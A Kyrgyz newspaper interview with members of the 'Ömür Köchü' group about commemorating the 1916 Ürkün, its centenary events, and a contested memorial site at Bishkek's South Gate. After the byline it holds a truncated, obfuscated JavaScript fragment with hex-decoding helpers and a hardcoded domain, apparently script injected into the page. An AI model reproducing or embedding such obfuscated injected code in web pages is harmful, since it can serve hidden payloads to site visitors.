Үркүнгө – 100 жыл. “Өмүр көчүнүн” көч иши уланууда!

1015720040Ок менен дем беттешкен Үркүн  окуяларында канчалаган кандаштарыбыз шейит кетти. Ошол азаттык үчүн ажалга каршы аттанган аталардын урпактары өлкөбүз эгемендик алган жылдан тарта Үркүндө шейит кеткендерге куран окутуп, алардын жандары жай алсын үчүн бар аракеттерди көрүп, эскерүү менен катар эстеликтерди орнотуу иштерин аткарып келишүүдө. Дал ушул иштерди аткарууну алгачкылардан болуп тайманбай баштаган “Өмүр Көчү” тобу 25 жылдан берки аткарган ишин улай алдыда дагы “Үркүндүн 100” жылдыгына карата кандай иш-чараларды аткара тургандыгына кызыгып, топ жетекчиси Дөөлөт НУСУПОВ жана топ мүчөсү, архитектор Кайрат НАЗАРБАЕВ менен маек курдук.

– Үркүн окуясында шейит кеткен ата-бабаларыбызды эскерүү, алардын эл азаттыгы үчүн күрөшкөндүгүнө таазим кылуу максатында биргелешип иш жүргүзгөн “Өмүр Көчү” жүрүшүнүн тарыхы жана максаты тууралуу кыскача айтып берсеңиз.

6-Дөөлөт Нусупов

Дөөлөт Нусупов: – 1991-жылы Үркүн окуясынын 75 жылдыгын белгилөө боюнча “Ашар” козголушу маселе көтөрүп, аны “Асаба” улуттук кайра жаралуу партиясы жана “Жаш мөмөрчүлөр” кошууну колдоп, Бишкек – Каракол багытындагы 12 күндүк жөө жүрүштү “Өмүр Көчү” деп атап, “Үркүн” окуясынын 75 жылдыгына байланыштуу бир канча иш-чараларды биргеликте өткөрдүк. Жүрүштүн максаты орус падышачылыгынын зулумдук саясатынын айынан өз жерин таштай качып, азап-тозокту тартып кырылган ата-бабаларды эскерүү үчүн алардын баскан жолун басып өтүп, советтик доордо айтылбай келген чындыкты элге жеткирүү болгон.

– Коюлган  максаттар канчалык деңгээлде ишке ашты?

– Алгач жөө жүрүштү жалпы элдин колдоосу менен ийгиликтүү ишке ашырып алдык. Анан 1992-жылы Бишкектин “Түштүк дарбаза” аталыштагы аймактан ата-бабаларды эскерүү үчүн 4,6 гектар жер бөлдүрүп, таш эстелик орноттук. Кийин 2006-жылы 90 жылдыкты “Асаба” партиясы уюштуруп, “Ашар” козголушу колдоп “Бедел”, “Ак-Өгүз” ашууларына барып 90 жылдан бери ач бел, куу жондо көмүлбөй жаткан ата-бабалардын сөөгүн кепиндеп көмүп, эстелик орнотуп, кан чыгарып куран окуттук. Барскоондогу шаркыратманын жанында 13 боз үй тигилип, шейит кеткендерге кошок кошулуп, өкүрүк чыгарып эстеп ашын бердик. 2011-жылы “Кыргыз эл” коомдук бирикмесинин жаштары уюштурган иш чарада Каркырада ата-бабаларга арнап үч жерге эстелик ташын орнотуп, айланасын жашылдандыруу максатында бак-дарактарды отургуздук. Бирок биздин ушул “Өмүр Көчүндөгү” максаттардын баары эле ишке ашты дей албайм. Анткени, эң негизги максаттардын бири болгон Бишкектин Түштүк дарбазасына мемориалдык комплекс алигиче курулбай келет. Берилген жерге көз артып ресторан, кафе курам деп өз пайдасын ойлогон шылуундар көбөйдү. Биздин азаттык үчүн кан-жанын берип келген ата-бабаларга 4,6 гектар жерди ыраа көрбөй жатканыбыз акылга сыйбаган иш.

– Президентибиз тарабынан атайы жарлыкка кол коюлуп, быйыл мамлекеттикдеңгээлде “Үркүн” окуясына байланыштуу бир катар иш-чаралар өткөрүлөөрү күтүлүүдө.  “Өмүр көчү” жүрүшүнөн быйыл кандай иш-чараларды күтсөк болот?

– Бул ишти жасагыла деп бизди эч ким зордоп келген эмес. Өз көңүлүбүздөн жасап келатабыз. Канчалык тоскоолдуктар болсо дагы чын дилибизден ата-бабалардын арбагына таазим кылып жасагандыктан максатыбыздын өтөөсүнө чыгуудабыз. Жасаган ишибизди бирөөлөргө колко кылбадык, доомат артпадык, пайда издеп соодалашпадык. Ошондуктан 100 жылдыкта деле сырттан баам салып карап турбастан “Асаба” партиясы, “Ашар” козголушу, Кыргыз архитекторлор союзу жана “Ак Шумкар КУТ” жаштар коомдук бирикмеси болуп төрт уюм биригип “Өмүр Көчү-100” аталыштагы биримдик түздүк. Биримдиктин уюштуруу тобун түзүп, ага ар бир уюмдан бирден киши кирди. Биримдиктин Жобосун иштеп чыктык. Биримдиктин максаты “Өмүр Көчү” жүрүшүнүн жолун улап, ата-бабаларга таазим кылып куран окутуу, “Өмүр Көчү 75”тен бери басып өткөн жолубузду китеп кылып чыгаруу, 25 жылдан бери максатыбызга жетпей калган “Түштүк дарбазадагы” ата-бабаларга арналып бөлүнүп берилген жерге “Азаттык майданы” жана “Үркүн шейиттери” мемориалдык комплексин куруу үчүн иш алып баруу. “Түштүк дарбазада” таш эстелик орнотулгандан бери “Үркүнгө” кайдыгер карабаган коомдук уюмдар ал жерде ар дайым арбактарга куран түшүрүп келебиз. Ата-бабалардын арбактары 25 жылдан бери ал жерди байырлап калды. Ошондуктан бул жерди ким алып, өзүнүн кызыкчылыгына пайдаланам десе жаңылышат. “Арбактар ыраазы болмоюн, тирүүнүн иши жүрбөйт” деп бекеринен айтылбаган. Ошондуктан ал жерге көз арткандарды эсиңерге келип, ата-бабалардын арбагынан ал жерди талашпаганга чакырат элем. Максатыбыз – бул мемориалдык комплекс аркылуу кийинки муундарды шейит кеткен ата-бабалардын арбагына таазим кылдыруу менен, эли-жерин сүйүүгө, патриоттук сезимде тарбиялоого өбөлгө түзүү. Ал эми “Ата-Бейит” улуттук тарыхый комплексине орнотулуп жаткан  “Үркүнгө” арналган эстелик – ал тарыхый чындык экенинин далили.

6-Кайратбек Назарбаев

Кайрат Назарбаев: – Учурда “Ата-Бейит” мемориалдык комплексине 1916-жылкы каргашалуу окуяларга арналган мемориалдын курулушу албетте баарыбызды кубантууда. Бирок, өткөн жылдын Чын Куран айында маданият, маалымат жана туризм Министрлиги, Кыргыз Республикасынын өкмөтүнүн 7-май, 2014-жылы чыккан №148 буйругуна ылайык, 1916-жылкы каргашалуу окуяларга арналган мемориалдык комплексти жаратууга ачык чыгармачылык сынак жарыялап, бул сынактын жобосуна ылайык мемориалдык комплекс Бишкек шаарынын Түштүк дарбазасына жайгашуусу керек эле. Себеп дегенде Улуттук боштондук көтөрүлүштүн 75 жылдыгына карата Түштүк магистралы менен Байтик баатыр проспектилеринин кесилишинин жогору жагынан 4,6 чарчы жер “Үркүн” шейиттерине арналып бөлүнгөн болчу.

Эми суроо, биринчиден, кайсы белгисиз себептер менен уюштуруу комитети “Чыгыш дарбазадагы” мемориалдын ордун алмаштырып, башкы сынактын жобосуна өзгөртүү киргизди?  Экинчиден, “Ата-Бейит” тарыхый комплексиндеги 30-жылдары болуп өткөн репрессия жана 7-апрель окуясына арналган эстеликтер борбор калаабызда да орун алган. Мааниси боюнча каргашалуу Үркүн окуясы алардан төмөн калбайт, демек, “Ата-Бейит” мемориалдык комплексинен бөлүнгөн жерге  улуттук-боштондук күрөштө шейит кеткен кандаштарыбыздын  тоо-талаалардан терилип келген сөөктөрү коюлса, бейити орун алса, ал эми эл жана убакыт талап кылган бараандуу эстелик-комплекси Бишкек шаарыбыздын ичинде турса, ошол жерден шаар ичиндеги көпчүлүк эл, жаш муун куран түшүрүп, таазим кылып, шаар меймандары ушул эстелик аркылуу Үркүндөгү болгон тарыхый окуяларыбыздан маалымат алып турса жаманбы?

Эмне себептен өзүңүздөр даярдаган мемориалдык комплексти «Азаттык майданы» жана «Үркүн шейиттери» деп атадыңыздар?

– Узун тарыхыбызга көз чаптырсак, тарыхыбызда  кыргыз эли азаттык үчүн күрөшүп келген жана Үркүн окуясы да ошондой окуялардын эң эле ирисине кирет. Муну менен катар 31-августта эгемендүүлүгүбүздүн, башкача айтканда азаттыкка чыкканыбыздын 25 жылдыгын белгилегени турабыз. Мындай маанилүү иш-чараларды өткөрүү, окуяларды белгилөө үчүн атайы жер, атайы мемориалдык комплекси болушу керек деген маселени бекеринен көтөрүп жаткан жокпуз. Алсак, ошол эле Украина, Белоруссия, Өзбекстан, Казакстан ж.б. мамлекеттер мындай зор иш-чараларды өткөрүү үчүн  атайын “Азаттык майданын” курушкан. Бул өлкөлөрдүн да өз учурунда эл баатырлары азаттыкка көп умтулган, нечен күрөшүшкөн. Бүгүнкү күндө алардын урпактары да эл-жеринин азаттыгы үчүн күрөшкөн ата-бабаларына таазим кылып, “Азаттык майдандарын” ыйык тутушууда. Буюрса, биз да Бишкек шаарыбыздын “Түштүк дарбазасында” азаттыктын символу болгон майдан же аянт куруу менен ал жерди борбор шаарыбыздагы эң бир маанилүү жана көркөмдүү жайга айлантабыз деп ишенебиз.

– Ишиңиздерди ийгиликтер  коштосун!

Жаныбек ҮСӨНОВ

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *